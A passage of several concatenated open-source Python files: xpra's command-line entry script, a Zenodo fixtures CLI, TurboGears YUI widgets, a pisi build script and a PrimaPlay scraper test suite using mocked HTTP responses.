upgrade_str,
note_str]))
if XPRA_LOCAL_SERVERS_SUPPORTED:
parser.add_option("--start-child", action="append",
dest="children", metavar="CMD",
help="program to spawn in new server (may be repeated)")
parser.add_option("--exit-with-children", action="store_true",
dest="exit_with_children", default=False,
help="Terminate server when --start-child command(s) exit")
parser.add_option("--no-daemon", action="store_false",
dest="daemon", default=True,
help="Don't daemonize when running as a server")
parser.add_option("--xvfb", action="store",
dest="xvfb", default="Xvfb", metavar="CMD",
help="How to run the headless X server (default: '%default')")
parser.add_option("--bind-tcp", action="store",
dest="bind_tcp", default=None,
metavar="[HOST]:PORT",
help="Listen for connections over TCP (insecure)")
parser.add_option("-z", "--compress", action="store",
dest="compression_level", type="int", default=3,
metavar="LEVEL",
help="How hard to work on compressing data."
+ " 0 to disable compression,"
+ " 9 for maximal (slowest) compression. Default: %default.")
parser.add_option("--ssh", action="store",
dest="ssh", default=DEFAULT_SSH_CMD, metavar="CMD",
help="How to run ssh (default: '%default')")
parser.add_option("--remote-xpra", action="store",
dest="remote_xpra", default=".xpra/run-xpra",
metavar="CMD",
help="How to run xpra on the remote host (default: '%default')")
parser.add_option("-d", "--debug", action="store",
dest="debug", default=None, metavar="FILTER1,FILTER2,...",
help="List of categories to enable debugging for (or \"all\")")
(options, args) = parser.parse_args(cmdline[1:])
if not args:
parser.error("need a mode")
logging.root.setLevel(logging.INFO)
if options.debug is not None:
categories = options.debug.split(",")
for cat in categories:
if cat.startswith("-"):
logging.getLogger(cat[1:]).setLevel(logging.INFO)
if cat == "all":
logger = logging.root
else:
logger = logging.getLogger(cat)
logger.setLevel(logging.DEBUG)
logging.root.addHandler(logging.StreamHandler(sys.stderr))
mode = args.pop(0)
if mode in ("start", "upgrade") and XPRA_LOCAL_SERVERS_SUPPORTED:
nox()
from xpra.scripts.server import run_server
run_server(parser, options, mode, script_file, args)
elif mode == "attach":
try:
run_client(parser, options, args)
except KeyboardInterrupt:
sys.stdout.write("Exiting on keyboard interrupt\n")
elif mode == "stop":
nox()
run_stop(parser, options, args)
elif mode == "list" and XPRA_LOCAL_SERVERS_SUPPORTED:
run_list(parser, options, args)
elif mode == "_proxy" and XPRA_LOCAL_SERVERS_SUPPORTED:
nox()
run_proxy(parser, options, args)
else:
parser.error("invalid mode '%s'" % mode)
def parse_display_name(parser, opts, display_name):
if display_name.startswith("ssh:"):
desc = {
"type": "ssh",
"local": False
}
sshspec = display_name[len("ssh:"):]
if ":" in sshspec:
(desc["host"], desc["display"]) = sshspec.split(":", 1)
desc["display"] = ":" + desc["display"]
desc["display_as_args"] = [desc["display"]]
else:
desc["host"] = sshspec
desc["display"] = None
desc["display_as_args"] = []
desc["ssh"] = opts.ssh.split()
desc["full_ssh"] = desc["ssh"] + ["-T", desc["host"]]
desc["remote_xpra"] = opts.remote_xpra.split()
desc["full_remote_xpra"] = desc["full_ssh"] + desc["remote_xpra"]
return desc
elif display_name.startswith(":"):
desc = {
"type": "unix-domain",
"local": True,
"display": display_name,
}
return desc
elif display_name.startswith("tcp:"):
desc = {
"type": "tcp",
"local": False,
}
host_spec = display_name[4:]
(desc["host"], port_str) = host_spec.split(":", 1)
desc["port"] = int(port_str)
if desc["host"] == "":
desc["host"] = "127.0.0.1"
return desc
else:
parser.error("unknown format for display name")
def pick_display(parser, opts, extra_args):
if len(extra_args) == 0:
if not XPRA_LOCAL_SERVERS_SUPPORTED:
parser.error("need to specify a display")
# Pick a default server
sockdir = DotXpra()
servers = sockdir.sockets()
live_servers = [display
for (state, display) in servers
if state is DotXpra.LIVE]
if len(live_servers) == 0:
parser.error("cannot find a live server to connect to")
elif len(live_servers) == 1:
return parse_display_name(parser, opts, live_servers[0])
else:
parser.error("there are multiple servers running, please specify")
elif len(extra_args) == 1:
return parse_display_name(parser, opts, extra_args[0])
else:
parser.error("too many arguments")
def _socket_connect(sock, target):
try:
sock.connect(target)
except socket.error, e:
sys.exit("Connection failed: %s" % (e,))
return SocketConnection(sock)
def connect_or_fail(display_desc):
if display_desc["type"] == "ssh":
cmd = (display_desc["full_remote_xpra"]
+ ["_proxy"] + display_desc["display_as_args"])
try:
child = Popen(cmd, stdin=PIPE, stdout=PIPE)
except OSError, e:
sys.exit("Error running ssh program '%s': %s" % (cmd[0], e))
return TwoFileConnection(child.stdin, child.stdout)
elif XPRA_LOCAL_SERVERS_SUPPORTED and display_desc["type"] == "unix-domain":
sockdir = DotXpra()
sock = socket.socket(socket.AF_UNIX)
return _socket_connect(sock,
sockdir.socket_path(display_desc["display"]))
elif display_desc["type"] == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return _socket_connect(sock,
(display_desc["host"], display_desc["port"]))
else:
assert False, "unsupported display type in connect"
def handshake_complete_msg(*args):
sys.stdout.write("Attached (press Control-C to detach)\n")
def got_gibberish_msg(obj, data):
if "assword" in data:
sys.stdout.write("Your ssh program appears to be asking for a password.\n"
+ GOT_PASSWORD_PROMPT_SUGGESTION)
sys.stdout.flush()
if "login" in data:
sys.stdout.write("Your ssh program appears to be asking for a username.\n"
"Perhaps try using something like 'ssh:USER@host:display'?\n")
sys.stdout.flush()
def run_client(parser, opts, extra_args):
from xpra.client import XpraClient
conn = connect_or_fail(pick_display(parser, opts, extra_args))
if opts.compression_level < 0 or opts.compression_level > 9:
parser.error("Compression level must be between 0 and 9 inclusive.")
app = XpraClient(conn, opts.compression_level)
app.connect("handshake-complete", handshake_complete_msg)
app.connect("received-gibberish", got_gibberish_msg)
app.run()
def run_proxy(parser, opts, extra_args):
from xpra.proxy import XpraProxy
assert "gtk" not in sys.modules
server_conn = connect_or_fail(pick_display(parser, opts, extra_args))
app = XpraProxy(TwoFileConnection(sys.stdout, sys.stdin), server_conn)
app.run()
def run_stop(parser, opts, extra_args):
assert "gtk" not in sys.modules
magic_string = bencode(["hello", []]) + bencode(["shutdown-server"])
display_desc = pick_display(parser, opts, extra_args)
conn = connect_or_fail(display_desc)
while magic_string:
magic_string = magic_string[conn.write(magic_string):]
while conn.read(4096):
pass
if display_desc["local"]:
sockdir = DotXpra()
for i in xrange(6):
final_state = sockdir.server_state(display_desc["display"])
if final_state is DotXpra.LIVE:
time.sleep(0.5)
else:
break
if final_state is DotXpra.DEAD:
print "xpra at %s has exited." % display_desc["display"]
sys.exit(0)
elif final_state is DotXpra.UNKNOWN:
print ("How odd... I'm not sure what's going on with xpra at %s"
% display_desc["display"])
sys.exit(1)
elif final_state is DotXpra.LIVE:
print "Failed to shutdown xpra at %s" % display_desc["display"]
sys.exit(1)
else:
assert False
else:
print "Sent shutdown command"
def run_list(parser, opts, extra_args):
assert "gtk" not in sys.modules
if extra_args:
parser.error("too many arguments for mode")
sockdir = DotXpra()
results = sockdir.sockets()
if not results:
sys.stdout.write("No xpra sessions found\n")
else:
sys.stdout.write("Found the following xpra sessions:\n")
for state, display in results:
sys.stdout.write("\t%s session at %s" % (state, display))
if state is DotXpra.DEAD:
try:
os.unlink(sockdir.socket_path(display))
except OSError:
pass
else:
sys.stdout.write(" (cleaned up)")
sys.stdout.write("\n")
| njsmith/partiwm | xpra/scripts/main.py | Python | gpl-2.0 | 12,235 |
# -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2015, 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""CLI for Zenodo fixtures."""
from __future__ import absolute_import, print_function
import json
from os.path import dirname, join
import click
from flask.cli import with_appcontext
from invenio_communities.utils import initialize_communities_bucket
from sqlalchemy.orm.exc import NoResultFound
from .communities import loadcommunities
from .files import loaddemofiles, loadlocation
from .grants import loadfp6funders, loadfp6grants
from .licenses import loadlicenses, matchlicenses
from .oai import loadoaisets
from .pages import loadpages
from .records import loaddemorecords
@click.group()
def fixtures():
"""Command for loading fixture data."""
@fixtures.command()
@with_appcontext
def init():
"""Load basic data."""
loadpages()
loadlocation()
loadoaisets()
initialize_communities_bucket()
@fixtures.command('loadpages')
@click.option('--force', '-f', is_flag=True, default=False)
@with_appcontext
def loadpages_cli(force):
"""Load pages."""
loadpages(force=force)
click.secho('Created pages', fg='green')
@fixtures.command('loadlocation')
@with_appcontext
def loadlocation_cli():
"""Load data store location."""
loc = loadlocation()
click.secho('Created location {0}'.format(loc.uri), fg='green')
@fixtures.command('loadoaisets')
@with_appcontext
def loadoaisets_cli():
"""Load OAI-PMH sets."""
sets_count = loadoaisets()
click.secho('Created {0} OAI-PMH sets'.format(len(sets_count)), fg='green')
@fixtures.command('loadfp6grants')
@with_appcontext
def loadfp6grants_cli():
"""Load one-off grants."""
loadfp6grants()
@fixtures.command('loadfp6funders')
@with_appcontext
def loadfp6funders_cli():
"""Load one-off funders."""
loadfp6funders()
@fixtures.command('loaddemorecords')
@with_appcontext
def loaddemorecords_cli():
"""Load demo records."""
click.echo('Loading demo data...')
with open(join(dirname(__file__), 'data/records.json'), 'r') as fp:
data = json.load(fp)
click.echo('Sending tasks to queue...')
with click.progressbar(data) as records:
loaddemorecords(records)
click.echo("1. Start Celery:")
click.echo(" celery worker -A zenodo.celery -l INFO")
click.echo("2. After tasks have been processed start reindexing:")
click.echo(" zenodo migration recordsrun")
click.echo(" zenodo migration reindex recid")
click.echo(" zenodo index run -d -c 4")
@fixtures.command('loaddemofiles')
@click.argument('source', type=click.Path(exists=True, dir_okay=False,
resolve_path=True))
@with_appcontext
def loaddemofiles_cli(source):
"""Load demo files."""
loaddemofiles(source)
@fixtures.command('loadlicenses')
@with_appcontext
def loadlicenses_cli():
"""Load Zenodo licenses."""
loadlicenses()
@fixtures.command('matchlicenses')
@click.argument('legacy_source', type=click.Path(exists=True, dir_okay=False,
resolve_path=True))
@click.argument('od_source', type=click.Path(exists=True, dir_okay=False,
resolve_path=True))
@click.argument('destination', type=click.Path(exists=False, dir_okay=False))
def matchlicenses_cli(legacy_source, od_source, destination):
"""Match legacy Zenodo licenses with OpenDefinition.org licenses."""
matchlicenses(legacy_source, od_source, destination)
@fixtures.command('loadcommunities')
@click.argument('owner_email')
@with_appcontext
def loadcommunities_cli(owner_email):
"""Load Zenodo communities."""
try:
loadcommunities(owner_email)
except NoResultFound:
click.echo("Error: Provided owner email does not exist.")
| lnielsen/zenodo | zenodo/modules/fixtures/cli.py | Python | gpl-2.0 | 4,703 |
# force floating point division. Can still use integer with //
from __future__ import division
# This file is used for importing the common utilities classes.
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append("../../../../../../")
from Util import Test
from Util.Test import _f_assert,HummerData,load_simulated_data
from FitUtil.EnergyLandscapes.InverseWeierstrass.Python.Code import \
InverseWeierstrass,WeierstrassUtil,WeightedHistogram
def assert_all_digitization_correct(objs):
for o in objs:
_assert_digitization_correct(o)
def run():
fwd,rev = load_simulated_data(n=2)
assert_all_digitization_correct(fwd)
assert_all_digitization_correct(rev)
if __name__ == "__main__":
run()
| prheenan/BioModel | EnergyLandscapes/InverseWeierstrass/Python/TestExamples/Testing/MainTestingWeightedHistograms.py | Python | gpl-2.0 | 747 |
import os.path
import itertools
import pkg_resources
from turbogears.widgets import Widget, TextField
from turbogears.widgets import CSSSource, JSSource, register_static_directory
from turbogears import config
from turbojson import jsonify
from util import CSSLink, JSLink
__all__ = ['YUIBaseCSS', 'YUIResetCSS', 'YUIFontsCSS', 'YUIGrids', 'YUIResetFontsGrids',
'YUIAnimation', 'YUIMenuBar', 'YUIAutoComplete', 'YUITreeView',
'yuibasecss', 'yuiresetcss', 'yuifontscss', 'yuigridscss', 'yui_reset_fonts_grids',
'YUIMenuLeftNav',
]
pkg_path = pkg_resources.resource_filename(__name__, os.path.join("static", "yui"))
register_static_directory("TGYUI", pkg_path)
skin = config.get('app.yui.skin', None)
skin_method = config.get('app.yui.skin_method', 'minimized')
idcounter = itertools.count()
def unique_id(prefix='tgyui'):
"""This function lets us have a new unique id each time a widget is rendered,
to be used by generated css & javascript snippets (e.g. initializing functions,
or instance-specific appearance).
If you have no widgets that are fetched by XMLHttpRequest and inserted into
the document at runtime (e.g. with innerHTML or MochiKit.DOM.swapDOM()), you
can stop reading here.
If you have such widgets, please note:
- if a page retrieves a new widget after the server has been restarted,
the idcounter variable will be reset and an old id could potentially
be recycled.
In order to avoid this, for widgets that are sent by XMLHttpRequest,
you should specify an id.
- CSSLink and JSLink directives will not be processed: you must make sure
the exising page already contains those (i.e. by returing another widget
instance from the controller, even if the page does not display it at first).
- CSSSource and JSSource will be inserted in the HTML fragment as usual,
but the browser will not run the javascript fragment. If the widget needs
to be initialized, you might want to do that in the code that retrives and
inserts the fragment.
There are ways to parse the HTML fragment, extract the <script> tags and execute them,
but it's outside the scope of this module."""
return '%s_%d' % (prefix, idcounter.next())
def skinned(pth, resource_name):
if not skin:
return [
CSSLink("TGYUI", '%s/assets/%s' % (pth, resource_name)),
]
base, ext = resource_name.rsplit('.', 1)
skin_methods = {
'minimized': [
CSSLink("TGYUI", '%s/assets/skins/%s/%s' % (pth, skin, resource_name)),
],
'core': [
CSSLink("TGYUI", '%s/assets/%s-core.%s' % (pth, base, ext)),
CSSLink("TGYUI", '%s/assets/skins/%s/%s-skin.%s' % (pth, skin, base, ext)),
],
'uber': [
CSSLink("TGYUI", '%s/assets/%s-core.%s' % (pth, base, ext)),
CSSLink("TGYUI", 'assets/skins/%s/skin.css' % skin),
],
}
if skin_method in skin_methods:
return skin_methods[skin_method]
else:
raise ValueError("app.yui.skin_method must be one of '%s'" % "', '".join(skin_methods.keys()))
class YUIBaseCSS(Widget):
css = [CSSLink("TGYUI", "base/base-min.css")]
yuibasecss = YUIBaseCSS()
class YUIResetCSS(Widget):
css = [CSSLink("TGYUI", "reset/reset-min.css")]
yuiresetcss = YUIResetCSS()
class YUIFontsCSS(Widget):
css = [CSSLink("TGYUI", "fonts/fonts-min.css")]
yuifontscss = YUIFontsCSS()
class YUIGrids(Widget):
css = [CSSLink("TGYUI", "grids/grids-min.css")]
yuigridscss = YUIGrids()
class YUIResetFontsGrids(Widget):
"""Use this in place of using all the three YUIResetCSS, YUIFontsCSS,
YUIGrids. You might want to explicitly include all three if you use other
widgets that depend on one of them, to avoid duplications."""
css = [CSSLink("TGYUI", "reset-fonts-grids/reset-fonts-grids.css")]
yui_reset_fonts_grids = YUIResetFontsGrids()
class YUIAnimation(Widget):
javascript = [JSLink("TGYUI", "yahoo-dom-event/yahoo-dom-event.js"),
JSLink("TGYUI", "animation/animation-min.js"),
JSLink("TGYUI", "thirdparty/effects-min.js"),
]
class YUIMenuBar(Widget):
template = 'TGYUI.templates.menubar'
params = ['id', 'entries', 'as_bar']
css = ([CSSLink("TGYUI", "reset-fonts-grids/reset-fonts-grids.css"),
CSSLink("TGYUI", "menu/assets/menu.css"),
] + skinned('menu', 'menu.css'))
javascript = [JSLink("TGYUI", "yahoo-dom-event/yahoo-dom-event.js"),
JSLink("TGYUI", "container/container_core-min.js"),
JSLink("TGYUI", "menu/menu-min.js"),
]
id = unique_id(prefix='mbar')
as_bar = True # set to False for e.g., leftNav
entries = [('Companies', '/companies', [
('add new', '/companies/add_new', []),
('browse', '/companies/browse', [
('by name', '/companies/browse/by_name'),
('by date', '/companies/browse/by_date'),
]),
('list', '/companies/list', []),
]),
('Contacts', '/contacts', []),
('Queries', '/queries', []),
('Mailings', '/mailings', []),
('Search', '/search', []),
]
def __init__(self, entries=None, *args, **kw):
super(YUIMenuBar, self).__init__(*args, **kw)
if entries:
self.entries = entries
class YUIMenuLeftNav(YUIMenuBar):
as_bar = False
class YUIAutoComplete(TextField):
"A standard, single-line text field with YUI AutoComplete enhancements."
template = 'TGYUI.templates.autocomplete'
params = ["attrs", "id", "search_controller", "result_schema", "search_param"]
params_doc = {'attrs' : 'Dictionary containing extra (X)HTML attributes for'
' the input tag',
'id' : 'ID for the entire AutoComplete construct.'}
attrs = {}
id = 'noid'
search_param = 'input'
javascript = [JSLink("TGYUI", "yahoo-dom-event/yahoo-dom-event.js"),
JSLink("TGYUI", "json/json-min.js"),
JSLink("TGYUI", "autocomplete/autocomplete-min.js"),
]
class YUITreeView(Widget):
css = (skinned('treeview', 'treeview.css') +
(skin and [CSSSource(".ygtvitem td {padding:0}.ygtvitem table {margin-bottom: 0}")] or []))
javascript = [
JSLink('TGYUI','yahoo/yahoo-min.js'),
JSLink('TGYUI','event/event-min.js'),
JSLink('TGYUI','treeview/treeview-min.js'),
JSSource("""
function yui_tree_init(id, entries) {
function yui_add_branch(node, branch) {
var newnode = new YAHOO.widget.TextNode(branch.data, node, branch.expanded);
if (branch.children) {
for (var i=0; i<branch.children.length; i++) {
yui_add_branch(newnode, branch.children[i]);
}
}
}
tree = new YAHOO.widget.TreeView(id);
yui_add_branch(tree.getRoot(), entries);
tree.draw();
}
""")
]
template = """
<div xmlns:py="http://purl.org/kid/ns#"
py:strip="True">
<div id="${id}" />
<script type="text/javascript">
yui_tree_init('${id}', ${entries});
</script>
</div>
"""
entries = {'expanded': True,
'data': {'href': '/stuff/foo', 'label': 'Foo'},
'children': [
{'expanded': True,
'data': {'href': '/stuff/foo/bar', 'label': 'Bar'},
'children': [
{'expanded': True,
'data': {'href': '/stuff/foo/baz', 'label': 'Baz'},
'children': []
}]
},
{'expanded': True,
'data': {'href': '/stuff/foo/gazonk', 'label': 'Gazonk'},
'children': []
}]}
id = None
params = ['entries', 'id']
def update_params(self, d):
super(YUITreeView, self).update_params(d)
if d['id'] is None:
d['id'] = unique_id()
d['entries'] = jsonify.encode(d['entries'])
# Yahoo DP: http://developer.yahoo.com/ypatterns/pattern.php?pattern=moduletabs
class YUITabView(Widget):
css = (skinned('tabview', 'tabview.css') +
(skin and [CSSSource(".yui-navset .yui-nav a:hover {color: #000}")] or []) +
[CSSLink('TGYUI','tabview/assets/border_tabs.css')]
)
javascript = [
JSLink('TGYUI','yahoo-dom-event/yahoo-dom-event.js'),
JSLink('TGYUI','element/element-beta-min.js'),
JSLink('TGYUI','connection/connection-min.js'),
JSLink('TGYUI','tabview/tabview-min.js'),
]
id = 'tgyui_tabber'
dynamic = [] # list of dictionaries with label (string), dataSrc (uri), cacheData (bool)
params = ['id', 'dynamic']
template = """
<script language="JavaScript" type="text/JavaScript">
(function() {
var tabview = new YAHOO.widget.TabView("${id}");
for each (var obj in ${dynamic}) {
tabview.addTab(new YAHOO.widget.Tab(obj))
}
})();
</script>
"""
def update_params(self, d):
super(YUITabView, self).update_params(d)
d['dynamic'] = jsonify.encode(d['dynamic'])
| viswimmer1/PythonGenerator | data/python_files/30004740/widgets.py | Python | gpl-2.0 | 9,892 |
#!/usr/bin/python
from pisi.actionsapi import shelltools, get, cmaketools, pisitools
def setup():
cmaketools.configure()
def build():
cmaketools.make()
def install():
cmaketools.install()
pisitools.dodoc ("AUTHORS", "ChangeLog", "COPYING")
| richard-fisher/repository | desktop/util/tint2/actions.py | Python | gpl-2.0 | 263 |
# -*- coding: utf-8 -*-
import unittest
import os, sys
import PrimaPlay
import urllib2
os.chdir(os.path.dirname(sys.argv[0]))
user = 'text@example.com';
password = 'password';
class mockTime:
def time(self):
return 1450875766
class mockUserAgent:
def __init__(self, url_map = {}):
self.ua = PrimaPlay.UserAgent()
self.url_map = {
'http://api.play-backend.iprima.cz/prehravac/init?_ts=1450875766&_infuse=1&productId=p135603': lambda url: 'test_player_init.js',
'http://play.iprima.cz/': lambda url: 'test_homepage.html',
'http://play.iprima.cz': lambda url: 'test_homepage.html',
'http://play.iprima.cz/prostreno': lambda url: 'test_filters.html',
'http://play.iprima.cz/vysledky-hledani-vse?query=prostreno': lambda url: 'test_search_page.html',
'http://play.iprima.cz/prostreno-IX-9': lambda url: 'test_video_page.html',
'http://play.iprima.cz/moje-play': lambda url: 'test_moje_play.html',
'https://play.iprima.cz/tdi/login/nav/form?csrfToken=868668da5dd5d622ddee5738cf226523ccc6b708-1451918185394-55fbc39b6ea5a369d8723b76': lambda url: 'test_homepage_logged.html',
'http://play.iprima.cz/prostreno?cat[]=EPISODE&src=p14877&sort[]=Rord&sort[]=latest': lambda url: 'test_prostreno_epizody.html',
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8': lambda url: self.raise_not_found(url),
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0001/4844/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8': lambda url: 'test_homepage.html',
'http://api.play-backend.iprima.cz/prehravac/init?_ts=1450875766&_infuse=1&productId=p148175': lambda url: 'test_player_init-2.js',
'http://play.iprima.cz/cestovani-cervi-dirou-s-morganem-freemanem-ii-9': lambda url: 'test_video_page-2.html',
'http://play.iprima.cz/prostreno?season=p14894&action=remove': lambda url: 'test_remove_all_filters.html',
'https://play.iprima.cz/tdi/dalsi?filter=allShows&sort[]=title&offset=54': lambda url: 'test_ajax_response.data',
'https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=18': lambda url: 'test_ajax_response_p.data'
}
self.url_map.update(url_map)
def get(self, url):
filename = self._get_filename_from_map(url)
return self._get_cache(filename)
def post(self, url, params):
filename = self._get_filename_from_map(url)
return self._get_cache(filename)
def _get_filename_from_map(self, url):
if not self.url_map.has_key(url):
print "ERROR! not found in url map: " + url
raise urllib2.HTTPError(url, 500, 'Internal server error', None, None)
return
get_url = self.url_map[url]
return get_url(url)
def _get_cache(self, filename):
fl = open(filename, 'r')
content = fl.read()
return content
def raise_not_found(self, url):
raise urllib2.HTTPError(url, 404, 'Not found', None, None)
class PrimaPlayUnitTest(unittest.TestCase):
def setUp(self):
pass
def test_get_player_init_link(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
self.assertEqual(prima_play.get_player_init_url('p135603'),
'http://api.play-backend.iprima.cz/prehravac/init?_ts=1450875766&_infuse=1&productId=p135603')
def test_get_video_link__sd(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
self.assertEqual(prima_play.get_video_link('p135603'),
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4.smil/playlist.m3u8')
def test_get_video_link__hd(self):
prima_play = PrimaPlay.Parser(mockUserAgent({
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8': lambda url: 'test_homepage.html',
}), mockTime())
self.assertEqual(prima_play.get_video_link('p135603'),
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8')
def test_get_video_link__force_sd(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime(), False)
self.assertEqual(prima_play.get_video_link('p135603'),
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4.smil/playlist.m3u8')
def test_get_next_list(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
next_list = prima_play.get_next_list('https://play.iprima.cz/tdi/dalsi?filter=allShows&sort[]=title&offset=54')
self.assertEqual(next_list.next_link,
'https://play.iprima.cz/tdi/dalsi?filter=allShows&sort[]=title&offset=72')
self.assertEqual(len(next_list.list), 18)
self.assertEqual(next_list.list[0].title, u'Největší esa mafie 1 Epizoda')
self.assertEqual(next_list.list[0].link, 'http://play.iprima.cz/nejvetsi-esa-mafie-1')
def test_get_next_list_series(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
next_list = prima_play.get_next_list('https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=18')
self.assertEqual(next_list.next_link,
'https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=36')
def test_get_page__player_page(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
page = prima_play.get_page('http://play.iprima.cz/prostreno-IX-9')
self.assertEqual(page.player.title, u'Prostřeno!')
self.assertEqual(page.player.video_link,
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4.smil/playlist.m3u8')
self.assertEqual(page.player.image_url,
'http://static.play-backend.iprima.cz/cdn/img/splash169/p135609-p183945/l_xhdpi')
self.assertEqual(page.player.description,
'Zábavná porce vašeho oblíbeného pořadu Prostřeno!')
self.assertEqual(page.player.broadcast_date, '16.12.2015')
self.assertEqual(page.player.duration, '42 min')
self.assertEqual(page.player.year, '2015')
self.assertEqual(len(page.video_lists), 2)
self.assertEqual(page.video_lists[0].title, u'Další epizody')
self.assertEqual(page.video_lists[0].link,
'http://play.iprima.cz/prostreno-IX-9?season=p135603&sort[]=ord&sort[]=Rlatest')
self.assertEqual(len(page.video_lists[0].item_list), 20)
self.assertEqual(page.video_lists[0].item_list[0].title,
u'Prostřeno! Sezóna 12: Epizoda 9')
self.assertEqual(page.video_lists[0].item_list[0].link,
'http://play.iprima.cz/prostreno/videa/prostreno-xii-9')
def test_get_page__player_page_2(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
page = prima_play.get_page('http://play.iprima.cz/cestovani-cervi-dirou-s-morganem-freemanem-ii-9')
self.assertEqual(page.player.title, u'Cestování červí dírou s Morganem Freemanem II (7)')
self.assertEqual(page.player.video_link,
'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0001/4844/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8')
self.assertEqual(page.player.image_url, None)
def test_get_page__homepage(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
page = prima_play.get_page('http://play.iprima.cz')
self.assertEqual(page.player, None)
self.assertEqual(len(page.video_lists), 8)
self.assertEqual(page.video_lists[1].title, u'Pořady a Seriály')
self.assertEqual(page.video_lists[1].link, None)
self.assertEqual(len(page.video_lists[1].item_list), 19)
self.assertEqual(page.video_lists[1].item_list[0].title,
u'Ohnivý kuře 32 Epizod')
self.assertEqual(page.video_lists[1].item_list[0].link,
'http://play.iprima.cz/ohnivy-kure')
self.assertTrue(page.video_lists[1].item_list[0].description);
self.assertEqual(len(page.filter_lists), 3)
self.assertEqual(page.filter_lists[0].title, u'Žánr')
self.assertEqual(len(page.filter_lists[0].item_list), 30)
self.assertEqual(page.filter_lists[0].item_list[0].title, u'Akční')
self.assertEqual(page.filter_lists[0].item_list[0].link,
'http://play.iprima.cz?genres[]=p14198')
def test_get_page__episodes(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
page = prima_play.get_page('http://play.iprima.cz/prostreno?cat[]=EPISODE&src=p14877&sort[]=Rord&sort[]=latest')
self.assertEqual(page.player, None)
self.assertEqual(len(page.video_lists), 1)
self.assertEqual(page.video_lists[0].title, None)
self.assertEqual(page.video_lists[0].link, None)
self.assertEqual(page.video_lists[0].next_link,
'https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=18')
self.assertEqual(len(page.video_lists[0].item_list), 18)
self.assertEqual(page.video_lists[0].item_list[0].title,
u'Praha Sezóna 3: Epizoda 10')
self.assertEqual(page.video_lists[0].item_list[0].link,
'http://play.iprima.cz/prostreno-ix-10')
self.assertEqual(len(page.filter_lists), 3)
self.assertEqual(page.filter_lists[0].title, u'Řada')
self.assertEqual(len(page.filter_lists[0].item_list), 11)
self.assertEqual(page.filter_lists[0].item_list[0].title, u'Sezóna 1')
self.assertEqual(page.filter_lists[0].item_list[0].link,
'http://play.iprima.cz/prostreno?season=p14883&sort[]=Rord&sort[]=latest')
def test_get_page__search(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
page = prima_play.get_page('http://play.iprima.cz/vysledky-hledani-vse?query=prostreno')
self.assertEqual(page.player, None)
self.assertEqual(len(page.video_lists), 3)
self.assertEqual(page.video_lists[0].title, u'Mezi seriály')
self.assertEqual(page.video_lists[0].link,
'http://play.iprima.cz/vysledky-hledani?query=prostreno&searchGroup=SERIES')
self.assertEqual(len(page.video_lists[0].item_list), 2)
self.assertEqual(page.video_lists[0].item_list[0].title,
u'VIP PROSTŘENO! 3 Řady , 32 Epizod')
self.assertEqual(page.video_lists[0].item_list[0].link,
'http://play.iprima.cz/vip-prostreno')
def test_get_page__current_filters(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
page = prima_play.get_page('http://play.iprima.cz/prostreno')
self.assertEqual(page.current_filters.link,
'https://play.iprima.cz/tdi/filtr/zrusit/prostreno?availability=new&season=p14894')
self.assertEqual(len(page.current_filters.item_list), 2)
self.assertEqual(page.current_filters.item_list[0].title, u'Novinky')
self.assertEqual(page.current_filters.item_list[0].link,
'http://play.iprima.cz/prostreno?season=p14894&action=remove')
def test_get_redirect_from_remove_link(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
self.assertEqual(prima_play.get_redirect_from_remove_link("http://play.iprima.cz/prostreno?season=p14894&action=remove"),
'http://play.iprima.cz/prostreno')
def test_Account_login(self):
